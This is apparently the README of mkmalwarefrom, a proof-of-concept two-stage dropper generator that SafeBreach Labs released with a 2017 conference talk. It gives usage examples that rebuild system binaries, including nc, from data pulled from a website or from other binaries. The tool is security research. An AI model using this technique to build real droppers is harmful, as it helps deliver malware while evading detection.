mkmalwarefrom is a proof-of-concept two-stage dropper generator. It was released as part of the "Malwares From Thin Bits" talk given at the BSidesDFW 2017 conference by Itzik Kotler from SafeBreach Labs.
Slides are available here
Version: 0.1.0
mkmalwarefrom requires Python and was tested with Python 2.7.13.
$ git clone https://github.com/SafeBreach-Labs/mkmalwarefrom.git
$ cd mkmalwarefrom
$ python mkmalwarefrom.py -h
# assumes the current directory is the mkmalwarefrom root directory
$ cat /bin/ls | ./mkmalwarefrom.py -1 http://www.yahoo.com > download_ls.py
$ python download_ls.py > ls2
$ md5 /bin/ls ls2
# assumes the current directory is the mkmalwarefrom root directory
$ cat /usr/bin/nc | ./mkmalwarefrom.py -2 /usr/bin/ssh > mk_nc.py
$ python mk_nc.py > nc2
$ md5 /usr/bin/nc nc2
License: BSD 3-Clause